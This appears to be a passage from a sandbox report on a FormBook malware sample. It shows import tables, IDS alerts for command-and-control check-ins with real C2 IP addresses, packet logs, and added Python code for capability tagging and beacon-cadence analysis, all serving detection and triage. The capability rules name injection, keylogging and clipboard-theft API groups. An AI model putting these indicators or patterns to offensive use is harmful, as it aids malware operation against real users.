USER32.dll | AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll | StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll | GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll | GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll | DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll | LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
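The import and resource tables above are what a static triage pass works from. The following is an added example (not Joe Sandbox code and not part of the sample) of how an analyst turns them into capability tags, together with the check that decides how much to trust those tags. The rule set, the tag names and the thresholds are this example's own choices; the API names are real Win32 exports, and the sample import subset and resource rows are copied from the tables above. The central caveat it encodes: when a large RT_RCDATA resource is incompressible (the report's ZLIB complexity column, a compressed-to-raw size ratio, sits at about 1.0) and the PE also imports LoadLibraryA/GetProcAddress, the import table is a lower bound on behaviour, because the real payload is stored opaquely and resolves its own APIs at run time. For a compiled AutoIt script, the PE is the interpreter and the script lives in exactly such a resource, so the imports describe the runtime, not the script.

```python
"""Static capability triage from a PE import table and resource table (added example)."""

# Hypothetical rule set for this example: Win32 APIs that tend to co-occur in one
# behaviour. The export names are real; the grouping and tag names are this example's.
CAPABILITY_RULES = {
    "process-injection": {"OpenProcess", "VirtualAllocEx", "WriteProcessMemory",
                          "CreateRemoteThread", "ResumeThread"},
    "apc-injection": {"QueueUserAPC", "NtQueueApcThread", "CreateRemoteThread"},
    "token-and-logon-abuse": {"OpenProcessToken", "AdjustTokenPrivileges",
                              "LookupPrivilegeValueW", "LogonUserW", "DuplicateTokenEx"},
    "keyboard-capture": {"GetAsyncKeyState", "GetKeyboardState", "GetKeyState"},
    "clipboard-access": {"OpenClipboard", "GetClipboardData", "SetClipboardData"},
    "anti-debug": {"IsDebuggerPresent", "OutputDebugStringW", "QueryPerformanceCounter"},
    "dynamic-api-resolution": {"LoadLibraryA", "GetProcAddress"},
    "http-client": {"InternetOpenW", "HttpOpenRequestW", "HttpSendRequestW", "InternetReadFile"},
}

# Constructed input: a subset of the docs_pdf.exe import table above, DLL -> API names.
SAMPLE_IMPORTS = {
    "KERNEL32.dll": ["OpenProcess", "VirtualAllocEx", "WriteProcessMemory", "ReadProcessMemory",
                     "ResumeThread", "IsDebuggerPresent", "OutputDebugStringW",
                     "QueryPerformanceCounter", "LoadLibraryA", "GetProcAddress", "CreateProcessW"],
    "ADVAPI32.dll": ["OpenProcessToken", "AdjustTokenPrivileges", "LookupPrivilegeValueW",
                     "LogonUserW", "DuplicateTokenEx", "CreateProcessAsUserW"],
    "USER32.dll": ["GetAsyncKeyState", "GetKeyboardState", "GetKeyState", "OpenClipboard",
                   "GetClipboardData", "SetClipboardData", "BlockInput"],
    "WININET.dll": ["InternetOpenW", "HttpOpenRequestW", "HttpSendRequestW", "InternetReadFile"],
}

# Constructed input: four rows of the resource table above (type, RVA, size, ZLIB complexity).
SAMPLE_RESOURCES = [
    ("RT_ICON", 0xc84a0, 0x128, 0.3885135135135135),
    ("RT_STRING", 0xce148, 0x594, 0.3333333333333333),
    ("RT_RCDATA", 0xd0410, 0x506a6, 1.0003369947355958),
    ("RT_MANIFEST", 0x120c20, 0x3ef, 0.5074478649453823),
]


def tag_capabilities(imports, rules=CAPABILITY_RULES, min_ratio=0.6):
    """Return {tag: sorted matched APIs} for rules where >= min_ratio of the APIs are imported.

    A ratio rather than an exact match tolerates partial groups (injection that resumes a
    thread instead of calling CreateRemoteThread) while not firing on a single API.
    """
    present = {api for apis in imports.values() for api in apis}
    tags = {}
    for tag, apis in rules.items():
        hit = apis & present
        if len(hit) / len(apis) >= min_ratio:
            tags[tag] = sorted(hit)
    return tags


def opaque_payload_resources(resources, min_size=0x10000, min_complexity=0.95):
    """RCDATA blobs that zlib cannot shrink (complexity ~1.0) are usually packed or encrypted.

    Such a blob next to a generic interpreter import set (an AutoIt runtime, for instance)
    means the imports describe the loader, not the payload it carries.
    """
    return [(rtype, hex(rva), size) for rtype, rva, size, cplx in resources
            if rtype == "RT_RCDATA" and size >= min_size and cplx >= min_complexity]


def triage(imports, resources):
    """Combine both views and say explicitly how far the static tags can be trusted."""
    tags = tag_capabilities(imports)
    payloads = opaque_payload_resources(resources)
    # Anything resolved through GetProcAddress or a direct syscall never appears in the
    # import table, so a missing tag (e.g. apc-injection) is not evidence of absence.
    caveat = "imports are a lower bound" if "dynamic-api-resolution" in tags or payloads else ""
    return {"tags": tags, "payload_resources": payloads, "caveat": caveat}


if __name__ == "__main__":
    import json
    print(json.dumps(triage(SAMPLE_IMPORTS, SAMPLE_RESOURCES), indent=2))
```

On the sample rows the process-injection, token, keyboard, clipboard, anti-debug and HTTP tags fire, while apc-injection does not, even though the sandbox's dynamic signatures are the place to confirm or refute it; the returned caveat is what should accompany the tags in a report.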
Language of compilation system | Country where language is spoken
English | Great Britain
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
07/13/24-00:02:48.729631 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49718 | 80 | 192.168.2.6 | 3.33.130.190
07/13/24-00:03:13.390597 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49724 | 80 | 192.168.2.6 | 162.43.105.95
07/13/24-00:03:27.012872 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49728 | 80 | 192.168.2.6 | 37.9.175.173
07/13/24-00:03:40.530049 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49734 | 80 | 192.168.2.6 | 203.161.41.207
07/13/24-00:03:53.802060 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49738 | 80 | 192.168.2.6 | 3.33.130.190
07/13/24-00:04:06.889781 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49743 | 80 | 192.168.2.6 | 3.33.130.190
07/13/24-00:04:20.054098 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49747 | 80 | 192.168.2.6 | 51.89.93.192
07/13/24-00:04:33.327718 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49751 | 80 | 192.168.2.6 | 3.33.130.190
07/13/24-00:04:46.484649 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49755 | 80 | 192.168.2.6 | 188.114.96.3
07/13/24-00:05:00.043647 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49759 | 80 | 192.168.2.6 | 45.130.41.38
07/13/24-00:05:14.257772 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49763 | 80 | 192.168.2.6 | 3.33.130.190
07/13/24-00:05:28.251797 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49768 | 80 | 192.168.2.6 | 3.33.130.190
07/13/24-00:05:41.372349 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49772 | 80 | 192.168.2.6 | 103.176.91.154
07/13/24-00:05:54.908226 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49776 | 80 | 192.168.2.6 | 5.78.41.174
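The Snort alerts fire once per contacted host, but the per-packet TCP table that follows holds the fuller picture: short bursts of connections to one host, then a move to the next. The following is an added example (not Joe Sandbox code) of turning such a packet table into flows and a per-destination cadence summary, which is the view a detection engineer needs to write a beaconing rule or to decide which of the contacted IPs deserve blocking. The input rows are copied from the packet table below (the first packets of each connection plus one server-to-client row to show the filtering); the client address 192.168.2.6 is the sandbox host shown in the table, and the helper names are this example's own.

```python
"""Flow reconstruction and beacon-cadence summary for a Joe Sandbox TCP packet table."""
from collections import defaultdict
from datetime import datetime
from statistics import median

# Constructed sample: rows copied from the packet table below, as
# (timestamp, source port, dest port, source IP, dest IP).
SAMPLE_ROWS = [
    ("Jul 13, 2024 00:02:48.722065926 CEST", 49718, 80, "192.168.2.6", "3.33.130.190"),
    ("Jul 13, 2024 00:02:48.727324009 CEST", 80, 49718, "3.33.130.190", "192.168.2.6"),
    ("Jul 13, 2024 00:03:05.780431986 CEST", 49720, 80, "192.168.2.6", "162.43.105.95"),
    ("Jul 13, 2024 00:03:08.320368052 CEST", 49722, 80, "192.168.2.6", "162.43.105.95"),
    ("Jul 13, 2024 00:03:10.850405931 CEST", 49723, 80, "192.168.2.6", "162.43.105.95"),
    ("Jul 13, 2024 00:03:13.381617069 CEST", 49724, 80, "192.168.2.6", "162.43.105.95"),
    ("Jul 13, 2024 00:03:19.285409927 CEST", 49725, 80, "192.168.2.6", "37.9.175.173"),
    ("Jul 13, 2024 00:03:21.844384909 CEST", 49726, 80, "192.168.2.6", "37.9.175.173"),
    ("Jul 13, 2024 00:03:24.460939884 CEST", 49727, 80, "192.168.2.6", "37.9.175.173"),
    ("Jul 13, 2024 00:03:27.006433010 CEST", 49728, 80, "192.168.2.6", "37.9.175.173"),
    ("Jul 13, 2024 00:03:32.920265913 CEST", 49729, 80, "192.168.2.6", "203.161.41.207"),
    ("Jul 13, 2024 00:03:35.461092949 CEST", 49732, 80, "192.168.2.6", "203.161.41.207"),
    ("Jul 13, 2024 00:03:37.991241932 CEST", 49733, 80, "192.168.2.6", "203.161.41.207"),
    ("Jul 13, 2024 00:03:40.521823883 CEST", 49734, 80, "192.168.2.6", "203.161.41.207"),
    ("Jul 13, 2024 00:03:46.184536934 CEST", 49735, 80, "192.168.2.6", "3.33.130.190"),
    ("Jul 13, 2024 00:03:48.726022005 CEST", 49736, 80, "192.168.2.6", "3.33.130.190"),
]


def parse_ts(ts):
    """Parse the report's 'Mon DD, YYYY HH:MM:SS.nnnnnnnnn TZ' form.

    The sandbox prints nanoseconds; datetime carries microseconds, so the fraction is
    truncated to six digits. The zone suffix is dropped (all rows share it).
    """
    base, rest = ts.split(".", 1)
    frac, _zone = rest.split(" ", 1)
    return datetime.strptime(f"{base}.{frac[:6]}", "%b %d, %Y %H:%M:%S.%f")


def build_flows(rows, client_ip="192.168.2.6"):
    """Return {(client port, server IP): first-seen time} for client-initiated connections.

    Server-to-client packets belong to an existing flow and are skipped; the ephemeral
    client port is what distinguishes one connection from the next to the same host.
    """
    flows = {}
    for ts, sport, _dport, sip, dip in rows:
        if sip != client_ip:
            continue
        key = (sport, dip)
        t = parse_ts(ts)
        if key not in flows or t < flows[key]:
            flows[key] = t
    return flows


def cadence_by_destination(flows):
    """Per server IP: connection count and the median gap in seconds between connections."""
    per_dst = defaultdict(list)
    for (_port, dip), t in flows.items():
        per_dst[dip].append(t)
    summary = {}
    for dip, times in per_dst.items():
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        summary[dip] = {"connections": len(times),
                        "median_gap_s": round(median(gaps), 2) if gaps else None}
    return summary


def rotation_order(flows):
    """Server IPs in the order the sample first contacted them."""
    seen = []
    for (_port, dip), _t in sorted(flows.items(), key=lambda kv: kv[1]):
        if dip not in seen:
            seen.append(dip)
    return seen


if __name__ == "__main__":
    flows = build_flows(SAMPLE_ROWS)
    print(rotation_order(flows))
    for dip, stats in cadence_by_destination(flows).items():
        print(dip, stats)
```

The Snort alert rows above join to these flows on (source port, dest IP); with the rows of this sample, only the last connection of each four-connection burst carries an alert, which is worth remembering when an IDS hit count is used as a proxy for the number of C2 contacts.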
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 13, 2024 00:02:48.722065926 CEST | 49718 | 80 | 192.168.2.6 | 3.33.130.190
Jul 13, 2024 00:02:48.727324009 CEST | 80 | 49718 | 3.33.130.190 | 192.168.2.6
Jul 13, 2024 00:02:48.727552891 CEST | 49718 | 80 | 192.168.2.6 | 3.33.130.190
Jul 13, 2024 00:02:48.729630947 CEST | 49718 | 80 | 192.168.2.6 | 3.33.130.190
Jul 13, 2024 00:02:48.734525919 CEST | 80 | 49718 | 3.33.130.190 | 192.168.2.6
Jul 13, 2024 00:02:49.193123102 CEST | 80 | 49718 | 3.33.130.190 | 192.168.2.6
Jul 13, 2024 00:02:49.193289042 CEST | 80 | 49718 | 3.33.130.190 | 192.168.2.6
Jul 13, 2024 00:02:49.193367004 CEST | 49718 | 80 | 192.168.2.6 | 3.33.130.190
Jul 13, 2024 00:02:49.196209908 CEST | 49718 | 80 | 192.168.2.6 | 3.33.130.190
Jul 13, 2024 00:02:49.201077938 CEST | 80 | 49718 | 3.33.130.190 | 192.168.2.6
Jul 13, 2024 00:03:05.780431986 CEST | 49720 | 80 | 192.168.2.6 | 162.43.105.95
Jul 13, 2024 00:03:05.785403967 CEST | 80 | 49720 | 162.43.105.95 | 192.168.2.6
Jul 13, 2024 00:03:05.785533905 CEST | 49720 | 80 | 192.168.2.6 | 162.43.105.95
Jul 13, 2024 00:03:05.787103891 CEST | 49720 | 80 | 192.168.2.6 | 162.43.105.95
Jul 13, 2024 00:03:05.791898966 CEST | 80 | 49720 | 162.43.105.95 | 192.168.2.6
Jul 13, 2024 00:03:06.594902992 CEST | 80 | 49720 | 162.43.105.95 | 192.168.2.6
Jul 13, 2024 00:03:06.594926119 CEST | 80 | 49720 | 162.43.105.95 | 192.168.2.6
Jul 13, 2024 00:03:06.594978094 CEST | 80 | 49720 | 162.43.105.95 | 192.168.2.6
Jul 13, 2024 00:03:06.595040083 CEST | 49720 | 80 | 192.168.2.6 | 162.43.105.95
Jul 13, 2024 00:03:06.595040083 CEST | 49720 | 80 | 192.168.2.6 | 162.43.105.95
Jul 13, 2024 00:03:07.300868988 CEST | 49720 | 80 | 192.168.2.6 | 162.43.105.95
Jul 13, 2024 00:03:08.320368052 CEST | 49722 | 80 | 192.168.2.6 | 162.43.105.95
Jul 13, 2024 00:03:08.325402021 CEST | 80 | 49722 | 162.43.105.95 | 192.168.2.6
Jul 13, 2024 00:03:08.325510025 CEST | 49722 | 80 | 192.168.2.6 | 162.43.105.95
Jul 13, 2024 00:03:08.328007936 CEST | 49722 | 80 | 192.168.2.6 | 162.43.105.95
Jul 13, 2024 00:03:08.332791090 CEST | 80 | 49722 | 162.43.105.95 | 192.168.2.6
Jul 13, 2024 00:03:09.169740915 CEST | 80 | 49722 | 162.43.105.95 | 192.168.2.6
Jul 13, 2024 00:03:09.169766903 CEST | 80 | 49722 | 162.43.105.95 | 192.168.2.6
Jul 13, 2024 00:03:09.169830084 CEST | 49722 | 80 | 192.168.2.6 | 162.43.105.95
Jul 13, 2024 00:03:09.169838905 CEST | 80 | 49722 | 162.43.105.95 | 192.168.2.6
Jul 13, 2024 00:03:09.169914961 CEST | 49722 | 80 | 192.168.2.6 | 162.43.105.95
Jul 13, 2024 00:03:09.834036112 CEST | 49722 | 80 | 192.168.2.6 | 162.43.105.95
Jul 13, 2024 00:03:10.850405931 CEST | 49723 | 80 | 192.168.2.6 | 162.43.105.95
Jul 13, 2024 00:03:10.857070923 CEST | 80 | 49723 | 162.43.105.95 | 192.168.2.6
Jul 13, 2024 00:03:10.857156038 CEST | 49723 | 80 | 192.168.2.6 | 162.43.105.95
Jul 13, 2024 00:03:10.859141111 CEST | 49723 | 80 | 192.168.2.6 | 162.43.105.95
Jul 13, 2024 00:03:10.865377903 CEST | 80 | 49723 | 162.43.105.95 | 192.168.2.6
Jul 13, 2024 00:03:10.866471052 CEST | 80 | 49723 | 162.43.105.95 | 192.168.2.6
Jul 13, 2024 00:03:11.663120031 CEST | 80 | 49723 | 162.43.105.95 | 192.168.2.6
Jul 13, 2024 00:03:11.663170099 CEST | 80 | 49723 | 162.43.105.95 | 192.168.2.6
Jul 13, 2024 00:03:11.663183928 CEST | 80 | 49723 | 162.43.105.95 | 192.168.2.6
Jul 13, 2024 00:03:11.663259029 CEST | 49723 | 80 | 192.168.2.6 | 162.43.105.95
Jul 13, 2024 00:03:12.363297939 CEST | 49723 | 80 | 192.168.2.6 | 162.43.105.95
Jul 13, 2024 00:03:13.381617069 CEST | 49724 | 80 | 192.168.2.6 | 162.43.105.95
Jul 13, 2024 00:03:13.388899088 CEST | 80 | 49724 | 162.43.105.95 | 192.168.2.6
Jul 13, 2024 00:03:13.388988018 CEST | 49724 | 80 | 192.168.2.6 | 162.43.105.95
Jul 13, 2024 00:03:13.390597105 CEST | 49724 | 80 | 192.168.2.6 | 162.43.105.95
Jul 13, 2024 00:03:13.397569895 CEST | 80 | 49724 | 162.43.105.95 | 192.168.2.6
Jul 13, 2024 00:03:14.196311951 CEST | 80 | 49724 | 162.43.105.95 | 192.168.2.6
Jul 13, 2024 00:03:14.196331978 CEST | 80 | 49724 | 162.43.105.95 | 192.168.2.6
Jul 13, 2024 00:03:14.196342945 CEST | 80 | 49724 | 162.43.105.95 | 192.168.2.6
Jul 13, 2024 00:03:14.196419001 CEST | 80 | 49724 | 162.43.105.95 | 192.168.2.6
Jul 13, 2024 00:03:14.196533918 CEST | 49724 | 80 | 192.168.2.6 | 162.43.105.95
Jul 13, 2024 00:03:14.196629047 CEST | 49724 | 80 | 192.168.2.6 | 162.43.105.95
Jul 13, 2024 00:03:14.199215889 CEST | 49724 | 80 | 192.168.2.6 | 162.43.105.95
Jul 13, 2024 00:03:14.203983068 CEST | 80 | 49724 | 162.43.105.95 | 192.168.2.6
Jul 13, 2024 00:03:19.285409927 CEST | 49725 | 80 | 192.168.2.6 | 37.9.175.173
Jul 13, 2024 00:03:19.292323112 CEST | 80 | 49725 | 37.9.175.173 | 192.168.2.6
Jul 13, 2024 00:03:19.292392969 CEST | 49725 | 80 | 192.168.2.6 | 37.9.175.173
Jul 13, 2024 00:03:19.293894053 CEST | 49725 | 80 | 192.168.2.6 | 37.9.175.173
Jul 13, 2024 00:03:19.300030947 CEST | 80 | 49725 | 37.9.175.173 | 192.168.2.6
Jul 13, 2024 00:03:20.056786060 CEST | 80 | 49725 | 37.9.175.173 | 192.168.2.6
Jul 13, 2024 00:03:20.056868076 CEST | 80 | 49725 | 37.9.175.173 | 192.168.2.6
Jul 13, 2024 00:03:20.056917906 CEST | 49725 | 80 | 192.168.2.6 | 37.9.175.173
Jul 13, 2024 00:03:20.057097912 CEST | 80 | 49725 | 37.9.175.173 | 192.168.2.6
Jul 13, 2024 00:03:20.057136059 CEST | 49725 | 80 | 192.168.2.6 | 37.9.175.173
Jul 13, 2024 00:03:20.800729990 CEST | 49725 | 80 | 192.168.2.6 | 37.9.175.173
Jul 13, 2024 00:03:21.844384909 CEST | 49726 | 80 | 192.168.2.6 | 37.9.175.173
Jul 13, 2024 00:03:21.930886984 CEST | 80 | 49726 | 37.9.175.173 | 192.168.2.6
Jul 13, 2024 00:03:21.931005955 CEST | 49726 | 80 | 192.168.2.6 | 37.9.175.173
Jul 13, 2024 00:03:21.932615995 CEST | 49726 | 80 | 192.168.2.6 | 37.9.175.173
Jul 13, 2024 00:03:21.940715075 CEST | 80 | 49726 | 37.9.175.173 | 192.168.2.6
Jul 13, 2024 00:03:22.665031910 CEST | 80 | 49726 | 37.9.175.173 | 192.168.2.6
Jul 13, 2024 00:03:22.665676117 CEST | 80 | 49726 | 37.9.175.173 | 192.168.2.6
Jul 13, 2024 00:03:22.665771008 CEST | 49726 | 80 | 192.168.2.6 | 37.9.175.173
Jul 13, 2024 00:03:23.441420078 CEST | 49726 | 80 | 192.168.2.6 | 37.9.175.173
Jul 13, 2024 00:03:24.460939884 CEST | 49727 | 80 | 192.168.2.6 | 37.9.175.173
Jul 13, 2024 00:03:24.467514038 CEST | 80 | 49727 | 37.9.175.173 | 192.168.2.6
Jul 13, 2024 00:03:24.470588923 CEST | 49727 | 80 | 192.168.2.6 | 37.9.175.173
Jul 13, 2024 00:03:24.473283052 CEST | 49727 | 80 | 192.168.2.6 | 37.9.175.173
Jul 13, 2024 00:03:24.479578018 CEST | 80 | 49727 | 37.9.175.173 | 192.168.2.6
Jul 13, 2024 00:03:24.482062101 CEST | 80 | 49727 | 37.9.175.173 | 192.168.2.6
Jul 13, 2024 00:03:25.168262959 CEST | 80 | 49727 | 37.9.175.173 | 192.168.2.6
Jul 13, 2024 00:03:25.168282986 CEST | 80 | 49727 | 37.9.175.173 | 192.168.2.6
Jul 13, 2024 00:03:25.168370008 CEST | 49727 | 80 | 192.168.2.6 | 37.9.175.173
Jul 13, 2024 00:03:25.988270044 CEST | 49727 | 80 | 192.168.2.6 | 37.9.175.173
Jul 13, 2024 00:03:27.006433010 CEST | 49728 | 80 | 192.168.2.6 | 37.9.175.173
Jul 13, 2024 00:03:27.011269093 CEST | 80 | 49728 | 37.9.175.173 | 192.168.2.6
Jul 13, 2024 00:03:27.011383057 CEST | 49728 | 80 | 192.168.2.6 | 37.9.175.173
Jul 13, 2024 00:03:27.012871981 CEST | 49728 | 80 | 192.168.2.6 | 37.9.175.173
Jul 13, 2024 00:03:27.017610073 CEST | 80 | 49728 | 37.9.175.173 | 192.168.2.6
Jul 13, 2024 00:03:27.696687937 CEST | 80 | 49728 | 37.9.175.173 | 192.168.2.6
Jul 13, 2024 00:03:27.696705103 CEST | 80 | 49728 | 37.9.175.173 | 192.168.2.6
Jul 13, 2024 00:03:27.696943998 CEST | 49728 | 80 | 192.168.2.6 | 37.9.175.173
Jul 13, 2024 00:03:27.698703051 CEST | 49728 | 80 | 192.168.2.6 | 37.9.175.173
Jul 13, 2024 00:03:27.703464031 CEST | 80 | 49728 | 37.9.175.173 | 192.168.2.6
Jul 13, 2024 00:03:32.920265913 CEST | 49729 | 80 | 192.168.2.6 | 203.161.41.207
Jul 13, 2024 00:03:32.926632881 CEST | 80 | 49729 | 203.161.41.207 | 192.168.2.6
Jul 13, 2024 00:03:32.926714897 CEST | 49729 | 80 | 192.168.2.6 | 203.161.41.207
Jul 13, 2024 00:03:32.928778887 CEST | 49729 | 80 | 192.168.2.6 | 203.161.41.207
Jul 13, 2024 00:03:32.935408115 CEST | 80 | 49729 | 203.161.41.207 | 192.168.2.6
Jul 13, 2024 00:03:33.536286116 CEST | 80 | 49729 | 203.161.41.207 | 192.168.2.6
Jul 13, 2024 00:03:33.536573887 CEST | 80 | 49729 | 203.161.41.207 | 192.168.2.6
Jul 13, 2024 00:03:33.536624908 CEST | 49729 | 80 | 192.168.2.6 | 203.161.41.207
Jul 13, 2024 00:03:34.441368103 CEST | 49729 | 80 | 192.168.2.6 | 203.161.41.207
Jul 13, 2024 00:03:35.461092949 CEST | 49732 | 80 | 192.168.2.6 | 203.161.41.207
Jul 13, 2024 00:03:35.465962887 CEST | 80 | 49732 | 203.161.41.207 | 192.168.2.6
Jul 13, 2024 00:03:35.466995001 CEST | 49732 | 80 | 192.168.2.6 | 203.161.41.207
Jul 13, 2024 00:03:35.469006062 CEST | 49732 | 80 | 192.168.2.6 | 203.161.41.207
Jul 13, 2024 00:03:35.473786116 CEST | 80 | 49732 | 203.161.41.207 | 192.168.2.6
Jul 13, 2024 00:03:36.064721107 CEST | 80 | 49732 | 203.161.41.207 | 192.168.2.6
Jul 13, 2024 00:03:36.064804077 CEST | 80 | 49732 | 203.161.41.207 | 192.168.2.6
Jul 13, 2024 00:03:36.064974070 CEST | 49732 | 80 | 192.168.2.6 | 203.161.41.207
Jul 13, 2024 00:03:36.972632885 CEST | 49732 | 80 | 192.168.2.6 | 203.161.41.207
Jul 13, 2024 00:03:37.991241932 CEST | 49733 | 80 | 192.168.2.6 | 203.161.41.207
Jul 13, 2024 00:03:37.996208906 CEST | 80 | 49733 | 203.161.41.207 | 192.168.2.6
Jul 13, 2024 00:03:37.996275902 CEST | 49733 | 80 | 192.168.2.6 | 203.161.41.207
Jul 13, 2024 00:03:37.998825073 CEST | 49733 | 80 | 192.168.2.6 | 203.161.41.207
Jul 13, 2024 00:03:38.006928921 CEST | 80 | 49733 | 203.161.41.207 | 192.168.2.6
Jul 13, 2024 00:03:38.006943941 CEST | 80 | 49733 | 203.161.41.207 | 192.168.2.6
Jul 13, 2024 00:03:38.602013111 CEST | 80 | 49733 | 203.161.41.207 | 192.168.2.6
Jul 13, 2024 00:03:38.602036953 CEST | 80 | 49733 | 203.161.41.207 | 192.168.2.6
Jul 13, 2024 00:03:38.602085114 CEST | 49733 | 80 | 192.168.2.6 | 203.161.41.207
Jul 13, 2024 00:03:39.503864050 CEST | 49733 | 80 | 192.168.2.6 | 203.161.41.207
Jul 13, 2024 00:03:40.521823883 CEST | 49734 | 80 | 192.168.2.6 | 203.161.41.207
Jul 13, 2024 00:03:40.528146982 CEST | 80 | 49734 | 203.161.41.207 | 192.168.2.6
Jul 13, 2024 00:03:40.530049086 CEST | 49734 | 80 | 192.168.2.6 | 203.161.41.207
Jul 13, 2024 00:03:40.530049086 CEST | 49734 | 80 | 192.168.2.6 | 203.161.41.207
